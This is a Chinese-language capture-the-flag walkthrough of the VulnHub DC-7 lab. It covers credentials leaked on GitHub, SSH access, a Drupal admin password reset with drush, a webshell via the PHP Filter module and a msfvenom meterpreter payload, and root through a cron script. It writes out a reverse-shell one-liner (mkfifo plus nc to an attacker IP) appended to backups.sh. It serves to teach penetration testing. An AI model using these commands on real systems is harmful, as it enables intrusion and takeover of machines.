靶机介绍
DC-7是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域积累经验。
尽管这不是一个过于技术性的挑战,但这并不容易。
虽然这是从早期DC版本开始的逻辑发展(我不会告诉您哪个),但是其中涉及一些新概念,但是您需要自己弄清楚这些概念。:-)如果您需要求助于暴力破解或字典攻击,您可能不会成功。
您需要做的是在盒子外面思考。
Waaaaaay在盒子外面。:-)
下载地址:DC: 7 ~ VulnHub
运用的知识
Github泄露网站数据库配置信息导致泄露SSHDrupal重置网站管理员密码Drupal8-Getshell
第三方软件提权backups.sh
信息搜集
拿到靶机先扫了扫端口开放服务:
1 |
nmap -A -T4 192.168.1.146 |
靶机开放了 22(ssh)、80(http)服务,其中 NMAP 检测出 http 使用的网站是 Drupal 8,我们先打开看看把:
扫描二维码关注公众号,回复:
14139949 查看本文章
打开网站页面之后看到了一段提示信息:
1 2 3 4 5 6 7 8 9 |
Welcome to DC-7 DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are. :-) While this challenge isn't all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won't succeed. What you will have to do, is to think "outside" the box. Way "outside" the box. :-) |
随后看了看 robots.txt 文件:
网站上只有这一个信息,那么我还是去找找有关于这个 CMS 的漏洞把:
由 whatweb 得到的信息它的版本是 Drupal 8,我搜索了有关于这个版本的漏洞发现有这些:
我挨个去利用了相关的 POC ,可惜都没有利用成功!这个时候回过头来再仔细读了一遍网站的提示我发现了一个版权信息:
既然作者提示我们说这个靶机的重点不在盒子里,是在盒子外面,而版权信息显示的是:DC7USER,那么会不会跟这个有关呢?
紧接着我抱着好奇心去 Google 搜索了 DC7USER:
搜索第一个是它的 Github,我打开看了看发现有一个项目:
点开后我找到了有关线索:
1 2 3 |
This is some "code" (yes, it's not the greatest code, but that wasn't the point) for the DC-7 challenge. This isn't a flag, btw, but if you have made it here, well done anyway. :-) |
这似乎是网站的源代码?于是我注意力放到了 ·config.php· 这个文件,打开看发现是一个数据库配置信息:
1 2 3 4 5 6 7 |
<?php $servername = "localhost"; $username = "dc7user"; $password = "MdR3xOgB7#dW"; $dbname = "Staff"; $conn = mysqli_connect($servername, $username, $password, $dbname); ?> |
登陆SSH
我用得到的账号和密码尝试登陆网站发现登陆失败:
随后我尝试登陆 SSH 登陆成功!
挺有意思的啊,这个 CTF 靶机超出了我的想象,有点像真正的渗透测试了,有那个味道了有木有!
随后我发现了一个 mbox 的文件,里面貌似是一封邮件信息:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 |
From root@dc-7 Thu Aug 29 17:00:22 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3EPu-0000CV-5C
for root@dc-7; Thu, 29 Aug 2019 17:00:22 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EPu-0000CV-5C@dc-7>
Date: Thu, 29 Aug 2019 17:00:22 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 17:15:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:15:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3EeF-0000Dx-G1
for root@dc-7; Thu, 29 Aug 2019 17:15:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EeF-0000Dx-G1@dc-7>
Date: Thu, 29 Aug 2019 17:15:11 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 17:30:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:30:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3Esl-0000Ec-JQ
for root@dc-7; Thu, 29 Aug 2019 17:30:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Esl-0000Ec-JQ@dc-7>
Date: Thu, 29 Aug 2019 17:30:11 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 17:45:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:45:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3F7H-0000G3-Nb
for root@dc-7; Thu, 29 Aug 2019 17:45:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3F7H-0000G3-Nb@dc-7>
Date: Thu, 29 Aug 2019 17:45:11 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 20:45:21 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 20:45:21 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3Hvd-0000ED-CP
for root@dc-7; Thu, 29 Aug 2019 20:45:21 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Hvd-0000ED-CP@dc-7>
Date: Thu, 29 Aug 2019 20:45:21 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 22:45:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 22:45:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3Jng-0000Iw-Rq
for root@dc-7; Thu, 29 Aug 2019 22:45:16 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Jng-0000Iw-Rq@dc-7>
Date: Thu, 29 Aug 2019 22:45:16 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
From root@dc-7 Thu Aug 29 23:00:12 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 23:00:12 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3K28-0000Ll-11
for root@dc-7; Thu, 29 Aug 2019 23:00:12 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3K28-0000Ll-11@dc-7>
Date: Thu, 29 Aug 2019 23:00:12 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
From root@dc-7 Fri Aug 30 00:15:18 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 00:15:18 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3LCo-0000Eb-02
for root@dc-7; Fri, 30 Aug 2019 00:15:18 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3LCo-0000Eb-02@dc-7>
Date: Fri, 30 Aug 2019 00:15:18 +1000
rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql [success]
From root@dc-7 Fri Aug 30 03:15:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 03:15:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3O0y-0000Ed-To
for root@dc-7; Fri, 30 Aug 2019 03:15:17 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3O0y-0000Ed-To@dc-7>
Date: Fri, 30 Aug 2019 03:15:17 +1000
rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql [success]
|
仔细看了一看发现它是一个定时脚本:/opt/script/backups.sh
我 ls 查看了一下,发现它只能 root 用户和 www-data 修改它,查看了脚本后好像删除了一些文件还有解压文件等等:
1 2 3 4 5 6 7 8 9 10 11 |
#!/bin/bash rm /home/dc7user/backups/* cd /var/www/html/ drush sql-dump --result-file=/home/dc7user/backups/website.sql cd .. tar -czf /home/dc7user/backups/website.tar.gz html/ gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz chown dc7user:dc7user /home/dc7user/backups/* rm /home/dc7user/backups/website.sql rm /home/dc7user/backups/website.tar.gz |
Drupal重置网站管理员密码
其中的 drush 我并不知道是什么命令,紧接着我去搜索了一波发现它是一个简化了创建和管理Drupal8网站的命令行工具。
相关文章:第15章 使用 Drush · Begining Drupal 8 中文版
看文档得知 sql-dump是使用mysqldump或等效的操作导出Drupal数据库为SQL的命令!
由于这个脚本上到处数据库所在的目录是 /var/www/html,那么我们也切换到这个目录,随后我用 drush 的命令重置了网站后台的密码:
1 |
drush user-password admin --password="pass" |
重置完后拿到账号 admin 密码 pass 登陆到了网站后台:
Drupal-Getshell
登陆到后台之后,我是 Google 上找到了getshell的方法,先是从 PHP | Drupal.org 下载它的模块:
下载完后来到 Extend - Install new module 上传到网站:
然后启用 PHP Filter 模块:
启用之后在Content 中添加我们的脚本木马,添加脚本木马前先用 MSF 生成一个 PHP 的木马:
1 |
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=7777 -f raw |
紧接着打开 MSF 设置参数开启监听:
最后添加我们的脚本代码到页面中:
(PS:如果失败了那么先设置为 PHP code,再把脚本代码放进去保存就可以了)
设置好之后成功反弹得到一枚 shell:
得到shell之后用MSF自带的模块查看有没有可以提权的模块,但是发现没有可利用提权的地方:
先让它切换到 shell 环境把:
1 2 |
shell
python -c 'import pty;pty.spawn("/bin/bash")'
|
利用backups.sh文件提权
随后我们来到了 /opt/scripts 目录下,因为之前我们知道了 backups.sh 它只能 root 用户和 www-data 用户权限去修改它:
所以我们就可以利用这段代码来反弹一个 shell 到 KALI,反弹回来的shell自然就是root权限!
先是我们在 KALI nc 监听 8888 ,然后输入这段代码:
1 |
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.128 8888 >/tmp/f" >> backups.sh |
这个时候就成功获取到 root 权限,拿到 FLAG:
交流群:
微信公众号:
知识星球:
